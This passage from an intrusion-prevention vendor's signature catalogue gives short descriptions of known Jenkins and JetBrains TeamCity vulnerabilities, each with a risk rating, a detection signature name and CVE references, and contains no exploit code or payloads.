Platform: Generic
Software: Jenkins
Type: Input Validation
Description: Insufficient validation of login requests by the getOrCreate() function causes a policy bypass vulnerability in Jenkins. A successful exploit allows an attacker to gain administrator access to the service.
Situation: HTTP_CRL-Jenkins-Ci-Server-Getorcreate-Policy-Bypass
References:
CVE-2018-1999001
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1999001
Back to top

Jenkins-Ci-Server-Gitlab-Hook-Cross-Site-Scripting

About this vulnerability: A vulnerability in Jenkins Gitlab Hook Plugin
Risk: Moderate
First detected in: sgpkg-ips-1219-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Jenkins
Type: Input Validation
Description: There has been reported a cross-site scripting vulnerability in Gitlab Hook plugin of Jenkins CI. Successful exploitation could lead in arbitrary script code execution in the browser.
Situation: HTTP_CSU-Jenkins-Ci-Server-Gitlab-Hook-Cross-Site-Scripting
References:
CVE-2020-2096
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2096
Back to top

Jenkins-Ci-Server-Groovy-Pipeline-Remote-Code-Execution

About this vulnerability: A vulnerability in Jenkins Groovy Plugin
Risk: Moderate
First detected in: sgpkg-ips-1190-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Jenkins
Type: Input Validation
Description: There exists a pre-auth remote code execution vulnerability in the Groovy Pipeline plugin component of Jenkins CI. This vulnerability could be exploited remotely. Successful exploitation leads in arbitrary code execution.
Situation: HTTP_CSU-Jenkins-Ci-Server-Groovy-Pipeline-Remote-Code-Execution
References:
CVE-2019-1003001
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1003001
Back to top

Jenkins-Ci-Server-Localedrivenresourceselector-Arbitrary-File-Read

About this vulnerability: A vulnerability in Jenkins
Risk: Moderate
First detected in: sgpkg-ips-1092-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Jenkins
Type: Input Validation
Description: Improper handling of Accept-Language HTTP headers causes an arbitrary file read vulnerability in Jenkins. A successful exploit allows an attacker to read arbitrary files on the target system.
Situation: HTTP_CS-Jenkins-Ci-Server-Localedrivenresourceselector-Arbitrary-File-Read
References:
CVE-2018-1999002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1999002
Back to top

Jenkins-Ci-Server-Multiple-Cross-Site-Request-Forgery

About this vulnerability: A vulnerability in Jenkins Jenkins
Risk: Moderate
First detected in: sgpkg-ips-900-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Jenkins
Type: Malfunction
Description: Improper validation of some requests causes a cross-site request forgery vulnerabillity in Jenkins server. Using a crafted reques, a remote attacker can gain the ability to run arbitrary code with the privileges of the Jenkins server.
Situation: HTTP_CS-Jenkins-Ci-Server-Multiple-Cross-Site-Request-Forgery
References:
CVE-2017-1000356
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000356
BID-98062
http://www.securityfocus.com/bid/98062
Back to top

Jenkins-Ci-Server-Xstream-Insecure-Deserialization

About this vulnerability: A vulnerability in Jenkins Jenkins
Risk: Moderate
First detected in: sgpkg-ips-753-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Jenkins
Type: Malfunction
Description: Arbitrary code can be exploited by exploiting a deserialization vulnerability in the XStream library.
Situation: HTTP_CS-Jenkins-Ci-Server-Xstream-Insecure-Deserialization
File-Text_Jenkins-Ci-Server-Xstream-Insecure-Deserialization
References:
CVE-2016-0792
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0792
Back to top

Jenkins-Claim-Plugin-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Jenkins Claim Plugin
Risk: Moderate
First detected in: sgpkg-ips-1360-5242
Last changed: sgpkg-ips-1360-5242
Platform: Generic
Software: Jenkins
Type: Input Validation
Description: There exists a stored cross-site scripting vulnerability in Jenkins Claim plugin. Successful exploitation could lead in execution of script code in the browser.
Situation: HTTP_CRL-Jenkins-Claim-Plugin-Stored-Cross-Site-Scripting
References:
CVE-2021-21619
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21619
Back to top

Jenkins-CLI-Deserialization

About this vulnerability: A vulnerability in Jenkins CLI.
Risk: High
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1368-5242
Platform: Linux
Software: Jenkins
Type: Input Validation
Description: A vulnerability in Jenkins CLI, version 2.56, which allows remote attackers to execute arbitrary code by sending a malicious serialized object within a serialized SignedObject, due to insufficient sanitization of data sent to the readFrom method within the Command class.
Situation: HTTP_CRL-Jenkins-CLI-Deserialization
References:
CVE-2017-1000353
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000353
Back to top

Jenkins-CLI-Rmi-Java-Deserialization

About this vulnerability: An attempt to exploit a Jenkins CLI RMI Java Deserialization vulnerability detected
Risk: High
First detected in: sgpkg-ips-975-5242
Last changed: sgpkg-ips-1732-5242
Platform: Generic
Software: Jenkins
Type: Configuration Error
Description: A vulnerability in Jenkins CLI, versions before 1.638 and LTS before 1.625.2, which allows remote attackers to execute arbitrary code via a crafted serialized Java object.
Situation: Generic_CS-Jenkins-Ci-Server-Commons-Collections-Library-Insecure-Deserialization
References:
CVE-2015-8103
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8103
BID-77636
http://www.securityfocus.com/bid/77636
Back to top

Jenkins-Config-File-Provider-Plugin-External-Entity-Injection

About this vulnerability: A vulnerability in Jenkins Config File Provider Plugin
Risk: Moderate
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1368-5242
Platform: Generic
Software: Jenkins
Type: Input Validation
Description: An XXE vulnerability exists in Jenkins Config File Provider Plugin. The vulnerability is due to insufficient validation of XML data when utilizing Config File Provider Plugin. A remote authenticated attacker could exploit this vulnerability by sending a crafted request. Successful exploitation could lead to the disclosure of file contents for any file readable by the Jenkins server process.
Situation: HTTP_CRL-Jenkins-Config-File-Provider-Plugin-External-Entity-Injection
References:
CVE-2021-21642
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21642
Back to top

Jenkins-Core-CLI-Cross-Site-WebSocket-Hijacking-CVE-2024-23898

About this vulnerability: An attempt to exploit a vulnerability in Jenkins detected
Risk: High
First detected in: sgpkg-ips-1686-5242
Last changed: sgpkg-ips-1686-5242
Platform: Generic
Software: Jenkins
Type: Input Validation
Description: Jenkins 2.217 through 2.441 (both inclusive), LTS 2.222.1 through 2.426.2 (both inclusive) does not perform origin validation of requests made through the CLI WebSocket endpoint, resulting in a cross-site WebSocket hijacking (CSWSH) vulnerability, allowing attackers to execute CLI commands on the Jenkins controller.
Situation: HTTP_CS-Jenkins-Core-CLI-Cross-Site-WebSocket-Hijacking-CVE-2024-23898
References:
CVE-2024-23898
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23898
Back to top

Jenkins-Core-Fileparametervalue-Directory-Traversal

About this vulnerability: A vulnerability in Jenkins
Risk: Moderate
First detected in: sgpkg-ips-1179-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Jenkins
Type: Directory Traversal
Description: There has been reported a directory traversal vulnerability in Jenkins. Authentication is required to exploit this vulnerability. Successful exploitation could lead in arbitrary file write and code execution.
Situation: HTTP_CS-Jenkins-Core-Fileparametervalue-Directory-Traversal
References:
CVE-2019-10352
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10352
Back to top

Jenkins-Core-JSON-Lib-Denial-Of-Service

About this vulnerability: A vulnerability in Jenkins Jenkins
Risk: Moderate
First detected in: sgpkg-ips-1820-5242
Last changed: sgpkg-ips-1820-5242
Platform: Generic
Software: Jenkins
Type: Input Validation
Description: Improper parsing of requests causes a denial of service vulnerability in Jenkins. An attacker can trigger the condition by sending crafted invalid JSON payloads in requests.
Situation: HTTP_CS-Jenkins-Core-JSON-Lib-Denial-Of-Service
References:
CVE-2024-47855
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47855
Back to top

Jenkins-Credentials-Plugin-Reflected-Cross-Site-Scripting

About this vulnerability: A vulnerability in Jenkins Credentials Plugin
Risk: Moderate
First detected in: sgpkg-ips-1350-5242
Last changed: sgpkg-ips-1350-5242
Platform: Generic
Software: Jenkins
Type: Input Validation
Description: There exists a reflected cross-site scripting vulnerability in Jenkins Credentials Plugin. Successful exploitation could lead in arbitrary execution of javascript code.
Situation: HTTP_CSU-Jenkins-Credentials-Plugin-Reflected-Cross-Site-Scripting
References:
CVE-2021-21648
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21648
Back to top

Jenkins-Credentials-Plugin-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Jenkins Credentials Plugin.
Risk: High
First detected in: sgpkg-ips-1469-5242
Last changed: sgpkg-ips-1469-5242
Platform: Generic
Software: Jenkins Credentials Plugin
Type: Input Validation
Description: A vulnerability in Jenkins Credentials Plugin, versions 1111.v35a_307992395 and prior, which allows remote attackers to execute arbitrary code by sending a crafted message to vulnerable server, due to insufficient validation of name and description parameters.
Situation: HTTP_CS-Jenkins-Credentials-Plugin-Stored-Cross-Site-Scripting
References:
CVE-2022-29036
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29036
Back to top

Jenkins-CVS-Plugin-Cross-Site-Request-Forgery

About this vulnerability: A vulnerability in Jenkins CVS Plugin
Risk: Moderate
First detected in: sgpkg-ips-1283-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Jenkins
Type: Malfunction
Description: The lack of a CSRF protection mechanism on certain endpoints causes a cross-site request forgery vulnerability in the Jenkins CVS plugin. A successful exploit may allow an attacker to manipulate the site contents.
Situation: HTTP_CSU_Jenkins-CVS-Plugin-Cross-Site-Request-Forgery
References:
CVE-2020-2184
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2184
Back to top

Jenkins-Dashboard-View-Plugin-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Jenkins Dashboard View Plugin
Risk: Moderate
First detected in: sgpkg-ips-1351-5242
Last changed: sgpkg-ips-1351-5242
Platform: Generic
Software: Jenkins
Type: Input Validation
Description: There exists a stored cross-site scripting vulnerability in Jenkins Dashboard View Plugin. Successful exploitation could lead in arbitrary execution of script code.
Situation: HTTP_CRL-Jenkins-Dashboard-View-Plugin-Stored-Cross-Site-Scripting
References:
CVE-2021-21649
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21649
Back to top

Jenkins-Extra-Columns-Plugin-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Jenkins Extra Columns Plugin
Risk: Moderate
First detected in: sgpkg-ips-1370-5242
Last changed: sgpkg-ips-1370-5242
Platform: Generic
Software: Jenkins
Type: Input Validation
Description: Insufficient request validation causes a cross-site scripting vulnerability in the Jenkins Extra Columns plugins. A successful exploit allows an attacker to execute arbitrary code in a user's browser.
Situation: HTTP_CRL-Jenkins-Extra-Columns-Plugin-Stored-Cross-Site-Scripting
References:
CVE-2021-21630
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21630
Back to top

Jenkins-File-Parameter-Plugin-Stashedfileparametervalue-Arbitrary-File-Write

About this vulnerability: A vulnerability in Jenkins File Parameter Plugin
Risk: High
First detected in: sgpkg-ips-1604-5242
Last changed: sgpkg-ips-1604-5242
Platform: Generic
Software: Jenkins
Type: Input Validation
Description: An arbitrary file write vulnerability has been reported in Jenkins File Parameter Plugin. The vulnerability is due to missing input validation error. A remote, authenticated attacker could exploit these vulnerabilities by sending a crafted request to the target server. Successfully exploiting these vulnerabilities could result in arbitrary code execution on the target system.
Situation: HTTP_CRL-Jenkins-File-Parameter-Plugin-Stashedfileparametervalue-Arbitrary-File-Write
References:
CVE-2023-32986
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32986
Back to top

Jenkins-Filesystem-Trigger-Plugin-External-Entity-Injection

About this vulnerability: A vulnerability in Jenkins Filesystem Trigger Plugin
Risk: Moderate
First detected in: sgpkg-ips-1359-5242
Last changed: sgpkg-ips-1359-5242
Platform: Generic
Software: Jenkins
Type: Input Validation
Description: An XXE vulnerability exists in Jenkins Filesystem Trigger Plugin. The vulnerability is due to insufficient validation of XML data in Filesystem Trigger Plugin. A remote authenticated attacker could exploit this vulnerability by sending a crafted request. Successful exploitation could lead to the disclosure of file contents for any file readable by the Jenkins.
Situation: File-TextId_Jenkins-Filesystem-Trigger-Plugin-External-Entity-Injection
References:
CVE-2021-21659
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21659
Back to top

Jenkins-Generic-Webhook-Trigger-Plugin-External-Entity-Injection

About this vulnerability: A vulnerability in Jenkins Generic Webhook Trigger Plugin
Risk: Moderate
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1368-5242
Platform: Generic
Software: Jenkins Generic Webhook Trigger Plugin
Type: Input Validation
Description: Insufficient validation of XPath parameters in the Generic Webhook Trigger Plugin for Jenkins causes an external entity injection vulnerability that allows a remote attacker to read arbitrary files on the target system.
Situation: HTTP_CRL-Jenkins-Generic-Webhook-Trigger-Plugin-External-Entity-Injection
References:
CVE-2021-21669
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21669
Back to top

Jenkins-Git-Client-Remote-Command-Execution

About this vulnerability: A vulnerability in Jenkins Git Client Plugin
Risk: Moderate
First detected in: sgpkg-ips-1194-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Jenkins
Type: Input Validation
Description: Improper handling of user supplied values to the git plugin causes a command execution vulnerability in Jenkins. A successful exploit allows an attacker to run arbitrary commands with the privileges of the plugin.
Situation: File-Text_Jenkins-Git-Client-Remote-Command-Execution
References:
CVE-2019-10392
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10392
Back to top

Jenkins-Gitlab-Plugin-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Jenkins GitLab Plugin
Risk: Moderate
First detected in: sgpkg-ips-1487-5242
Last changed: sgpkg-ips-1487-5242
Platform: Generic
Software: Jenkins GitLab Plugin
Type: Input Validation
Description: Insufficient validation of user-sent data causes a cross-site scripting vulnerability in Gitlab. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: File-Text_Jenkins-Gitlab-Plugin-Stored-Cross-Site-Scripting
References:
CVE-2022-34777
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34777
Back to top

Jenkins-Junit-Plugin-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Jenkins JUnit Plugin
Risk: Moderate
First detected in: sgpkg-ips-1485-5242
Last changed: sgpkg-ips-1485-5242
Platform: Generic
Software: Jenkins JUnit Plugin
Type: Input Validation
Description: Improper esacping of characters causes a cross-site scripting vulnerability in the JUnit plugin for Jenkins. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Jenkins-Junit-Plugin-Stored-Cross-Site-Scripting
References:
CVE-2022-34176
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34176
Back to top

Jenkins-Matrix-Project-Plugin-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Jenkins Matrix Project Plugin
Risk: Moderate
First detected in: sgpkg-ips-1431-5242
Last changed: sgpkg-ips-1431-5242
Platform: Generic
Software: Jenkins Matrix Plugin
Type: Input Validation
Description: Insufficient validation of node and label names, and label descriptions parameters in requests causes a cross-site scripting vulnerability in the Jenkins Matrix Project Plugin. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Jenkins-Matrix-Project-Plugin-Stored-Cross-Site-Scripting
References:
CVE-2022-20615
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-20615
Back to top

Jenkins-Nuget-Plugin-External-Entity-Injection

About this vulnerability: A vulnerability in Jenkins Nuget Plugin
Risk: Moderate
First detected in: sgpkg-ips-1358-5242
Last changed: sgpkg-ips-1358-5242
Platform: Generic
Software: Jenkins
Type: Input Validation
Description: There exists an XXE vulnerability in Jenkins NuGet Plugin. Successful exploitation could lead in disclosure of file contents.
Situation: HTTP_CS-Jenkins-Nuget-Plugin-External-Entity-Injection
References:
CVE-2021-21658
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21658
Back to top

Jenkins-Pipeline-Build-Step-Plugin-Job-Name-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Jenkins Pipeline: Build Step Plugin
Risk: Moderate
First detected in: sgpkg-ips-1563-5242
Last changed: sgpkg-ips-1563-5242
Platform: Generic
Software: Jenkins
Type: Input Validation
Description: Improper input validation for job names sent over the network causes a cross-site scripting vulnerability in Jenkins. A successful explot allows an attacker to execute arbitrary code on a user's browser.
Situation: HTTP_CRL-Jenkins-Pipeline-Build-Step-Plugin-Job-Name-Stored-Cross-Site-Scripting
References:
CVE-2023-25762
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25762
Back to top

Jenkins-Plot-Plugin-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Jenkins Plot Plugin
Risk: Moderate
First detected in: sgpkg-ips-1504-5242
Last changed: sgpkg-ips-1504-5242
Platform: Generic
Software: Jenkins
Type: Input Validation
Description: Improper input validation of plot descriptions in the Plot plugin causes a cross-site scripting vulnerability in Jenkins. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Jenkins-Plot-Plugin-Stored-Cross-Site-Scripting
References:
CVE-2022-34783
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34783
Back to top

Jenkins-Plugin-Resources-Directory-Traversal

About this vulnerability: A vulnerability in Jenkins
Risk: Moderate
First detected in: sgpkg-ips-1045-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Jenkins
Type: Directory Traversal
Description: There has been reported a directory traversal vulnerability in Jenkins. This vulnerability can be exploited by sending crafted request to the target system. Successful exploitation could lead to information disclosure.
Situation: HTTP_CSU-Jenkins-Plugin-Resources-Directory-Traversal
References:
CVE-2018-6356
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6356
Back to top

Jenkins-Remoting-Fetchjar-Arbitrary-File-Read

About this vulnerability: A vulnerability in Jenkins Jenkins
Risk: Moderate
First detected in: sgpkg-ips-1794-5242
Last changed: sgpkg-ips-1794-5242
Platform: Generic
Software: Jenkins
Type: Input Validation
Description: Improper input validation in the Remoting component in Jenkins causes an arbitrary file read vulnerability, which an attacker can exploit to gain access to files on the target system.
Situation: WebSocket_CS-Jenkins-Remoting-Fetchjar-Arbitrary-File-Read
Generic_CS-Jenkins-Remoting-Fetchjar-Arbitrary-File-Read
References:
CVE-2024-43044
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43044
Back to top

Jenkins-Repository-Connector-Plugin-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Jenkins Repository Connector Plugin
Risk: High
First detected in: sgpkg-ips-1644-5242
Last changed: sgpkg-ips-1644-5242
Platform: Generic
Software: Jenkins
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported in Jenkins Repository Connector plugin. This vulnerability is due to insufficient validation of the name and description properties in parameterDefinitions. A remote, authenticated attacker could exploit this vulnerability by sending a crafted message to vulnerable server. Successful exploitation could result in execution of script code in the security context of target user's browser.
Situation: HTTP_CRL-Jenkins-Plot-Plugin-Stored-Cross-Site-Scripting
References:
CVE-2021-21618
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21618
Back to top

Jenkins-Rundeck-Plugin-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Jenkins Rundeck Plugin
Risk: Moderate
First detected in: sgpkg-ips-1482-5242
Last changed: sgpkg-ips-1482-5242
Platform: Generic
Software: Jenkins Rundeck Plugin
Type: Input Validation
Description: Improper validation of URL schemes sent to the Rundeck webhook causes a cross-site scripting vulnerability in Jenkins. A successful exploit allows an attacker to execute arbitrary scripts in a target user's browser.
Situation: File-Text_Jenkins-Rundeck-Plugin-Stored-Cross-Site-Scripting
References:
CVE-2022-30956
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30956
Back to top

Jenkins-Script-Security-Plugin-Sandbox-Bypass-CVE-2019-1003029

About this vulnerability: A vulnerability in Jenkins
Risk: High
First detected in: sgpkg-ips-1467-5242
Last changed: sgpkg-ips-1467-5242
Platform: Generic
Software: Jenkins
Type: Malfunction
Description: There exists a sandbox bypass vulnerability in the Jenkins Script Security Plugin. Successful exploitation may lead in arbitrary code execution.
Situation: HTTP_CRL-Jenkins-Script-Security-Plugin-Sandbox-Bypass-CVE-2019-1003029
References:
CVE-2019-1003029
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1003029
Back to top

Jenkins-Scriptler-Plugin-Parameter-Names-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Jenkins Scriptler Plugin
Risk: Moderate
First detected in: sgpkg-ips-1366-5242
Last changed: sgpkg-ips-1366-5242
Platform: Generic
Software: Jenkins Scriptler Plugin
Type: Input Validation
Description: Insufficient validation of parameters causes a cross-site scripting vulnerability in Jenkins Scriptler Plugin. A successful exploit allows an attacker to execute arbitrary code on a user's browser.
Situation: HTTP_CRL-Jenkins-Scriptler-Plugin-Parameter-Names-Stored-Cross-Site-Scripting
References:
CVE-2021-21667
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21667
Back to top

Jenkins-Scriptler-Plugin-Script-Content-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Jenkins Scriptler Plugin
Risk: Moderate
First detected in: sgpkg-ips-1366-5242
Last changed: sgpkg-ips-1366-5242
Platform: Generic
Software: Jenkins Scriptler Plugin
Type: Input Validation
Description: Insufficient validation of parameters causes a cross-site scripting vulnerability in Jenkins Scriptler Plugin. A successful exploit allows an attacker to execute arbitrary code on a user's browser.
Situation: HTTP_CRL-Jenkins-Scriptler-Plugin-Script-Content-Stored-Cross-Site-Scripting
References:
CVE-2021-21668
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21668
Back to top

Jenkins-Selenium-HTML-Report-Plugin-XML-External-Entity-Injection

About this vulnerability: A vulnerability in Jenkins Selenium HTML Report Plugin.
Risk: High
First detected in: sgpkg-ips-1377-5242
Last changed: sgpkg-ips-1377-5242
Platform: Generic
Software: Jenkins Selenium HTML Report Plugin
Type: Input Validation
Description: A vulnerability in Jenkins Selenium HTML Report Plugin, versions prior to 1.1, which allows remote attackers to discolse sensitive information by sending crafted requests to the target server, due to insufficient handling of XML external entities in report files parsed by the plugin.
Situation: HTTP_CS-Jenkins-Selenium-HTML-Report-Plugin-XML-External-Entity-Injection
References:
CVE-2021-21672
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21672
Back to top

Jenkins-Sidebar-Link-Plugin-Icon-Directory-Traversal

About this vulnerability: A vulnerability in Jenkins Sidebar Link Plugin
Risk: High
First detected in: sgpkg-ips-1600-5242
Last changed: sgpkg-ips-1600-5242
Platform: Generic
Software: Jenkins Sidebar Link Plugin
Type: Directory Traversal
Description: An information disclosure vulnerability has been reported for Jenkins Sidebar Link Plugin. This vulnerability is due to a directory traversal when handling link icons. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in information disclosure.
Situation: HTTP_CSU-Jenkins-Sidebar-Link-Plugin-Icon-Directory-Traversal
References:
CVE-2023-32985
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32985
Back to top

Jenkins-Simple-Queue-Plugin-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Jenkins Simple Queue Plugin
Risk: Moderate
First detected in: sgpkg-ips-1815-5242
Last changed: sgpkg-ips-1815-5242
Platform: Generic
Software: Jenkins
Type: Input Validation
Description: Insufficient sanitization of the view name in Jenkins Simple Queue Plugin causes a cross-site scripting vulnerability which can be exploited by an attacker, allowing them to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Jenkins-Simple-Queue-Plugin-Stored-Cross-Site-Scripting
References:
CVE-2024-54003
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-54003
Back to top

Jenkins-Stapler-Remote-Code-Execution-CVE-2018-1000861

About this vulnerability: A vulnerability in Jenkins
Risk: High
First detected in: sgpkg-ips-1323-5242
Last changed: sgpkg-ips-1323-5242
Platform: Generic
Software: Jenkins
Type: Input Validation
Description: There exists a pre-auth remote code execution vulnerability in the Stapler framework used by Jenkins. Successful exploitation may lead in arbitrary code execution.
Situation: HTTP_CRL-Jenkins-Stapler-Remote-Code-Execution-CVE-2018-1000861
References:
CVE-2018-1000861
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000861
Back to top

Jenkins-Urltrigger-Plugin-External-Entity-Injection

About this vulnerability: A vulnerability in Jenkins URLTrigger Plugin
Risk: Moderate
First detected in: sgpkg-ips-1354-5242
Last changed: sgpkg-ips-1354-5242
Platform: Generic
Software: Jenkins
Type: Input Validation
Description: Insufficient validation of XML data processed by the URLTrigger Plugin causes an external entity injection vulnerability in Jenkins. A successful exploit may allow an attacker to read the contents of arbitrary files on the target system.
Situation: HTTP_CRL-Jenkins-Urltrigger-Plugin-External-Entity-Injection
References:
CVE-2021-21659
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21659
Back to top

JetBrains-TeamCity-Agent-Distribution-CVE-2024-31138-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in JetBrains TeamCity
Risk: Moderate
First detected in: sgpkg-ips-1716-5242
Last changed: sgpkg-ips-1716-5242
Platform: Generic
Software: JetBrains TeamCity
Type: Input Validation
Description: Improper input validation in the Agent Distribution page causes a cross-site scripting vulnerability in JetBrains TeamCity. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-JetBrains-TeamCity-Agent-Distribution-CVE-2024-31138-Stored-XSS
References:
CVE-2024-31138
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-31138
Back to top

JetBrains-TeamCity-Authentication-Bypass-CVE-2023-42793

About this vulnerability: A vulnerability in JetBrains TeamCity
Risk: High
First detected in: sgpkg-ips-1636-5242
Last changed: sgpkg-ips-1636-5242
Platform: Generic
Software: JetBrains TeamCity
Type: Malfunction
Description: An authentication bypass vulnerability has been reported in JetBrains TeamCity versions before 2023.05.4. Successfully exploiting this vulnerability allows remote code execution.
Situation: HTTP_CSU-JetBrains-TeamCity-Authentication-Bypass-CVE-2023-42793
References:
CVE-2023-42793
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-42793
Back to top

JetBrains-TeamCity-Authentication-Bypass-CVE-2024-27198

About this vulnerability: A vulnerability in JetBrains TeamCity
Risk: Critical
First detected in: sgpkg-ips-1699-5242
Last changed: sgpkg-ips-1699-5242
Platform: Generic
Software: JetBrains TeamCity
Type: Malfunction
Description: An authentication bypass vulnerability has been reported in JetBrains TeamCity versions before 2023.11.4. A remote user can exploit this vulnerability to gain full access to a vulnerable TeamCity server.
Situation: HTTP_CRL-JetBrains-TeamCity-Authentication-Bypass-CVE-2024-27198
References:
CVE-2024-27198
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27198
Back to top

JetBrains-TeamCity-Avatar-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in JetBrains TeamCity
Risk: Moderate
First detected in: sgpkg-ips-1568-5242
Last changed: sgpkg-ips-1568-5242
Platform: Generic
Software: JetBrains TeamCity
Type: Input Validation
Description: Insufficient validation of user data when creating or updating user's names on the target server causes a cross-site scripting vulnerability in JetBrains TeamCity. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: File-Text_JetBrains-TeamCity-Avatar-Stored-Cross-Site-Scripting
HTTP_CRL-JetBrains-TeamCity-Avatar-Stored-Cross-Site-Scripting
File-TextId_JetBrains-TeamCity-Avatar-Stored-Cross-Site-Scripting
References:
CVE-2022-48343
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48343
Back to top

JetBrains-TeamCity-Backup-Directory-Traversal

About this vulnerability: A vulnerability in JetBrains TeamCity
Risk: Moderate
First detected in: sgpkg-ips-1794-5242
Last changed: sgpkg-ips-1794-5242
Platform: Generic
Software: JetBrains TeamCity
Type: Directory Traversal
Description: Improper validation of the backup filename parameter in some requests causes a directory traversal vulnerability ion JetBrains TeamCity. A successful exploitation allows an attacker to write files in arbitrary locations on the target system.
Situation: HTTP_CRL-JetBrains-TeamCity-Backup-Directory-Traversal
References:
CVE-2024-47949
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47949
Back to top

JetBrains-TeamCity-Backup-History-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in JetBrains TeamCity
Risk: Moderate
First detected in: sgpkg-ips-1798-5242
Last changed: sgpkg-ips-1798-5242
Platform: Generic
Software: JetBrains TeamCity
Type: Input Validation
Description: Improper validation of the backup filename parameter in certain requests causes a cross-site scripting vulnerability in JetBrains TeamCity. A successful exploitation allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-JetBrains-TeamCity-Backup-History-Stored-Cross-Site-Scripting
References:
CVE-2024-47950
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47950
Back to top

JetBrains-TeamCity-Commit-Status-Publisher-Page-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in JetBrains TeamCity
Risk: Moderate
First detected in: sgpkg-ips-1607-5242
Last changed: sgpkg-ips-1607-5242
Platform: Generic
Software: JetBrains TeamCity
Type: Input Validation
Description: Improper input validation in the Commit Status Publisher page causes a cross-site scripting vulnerability in JetBrains TeamCity. A successful exploit allows an attacker to execute arbitrary code in a user's browser.
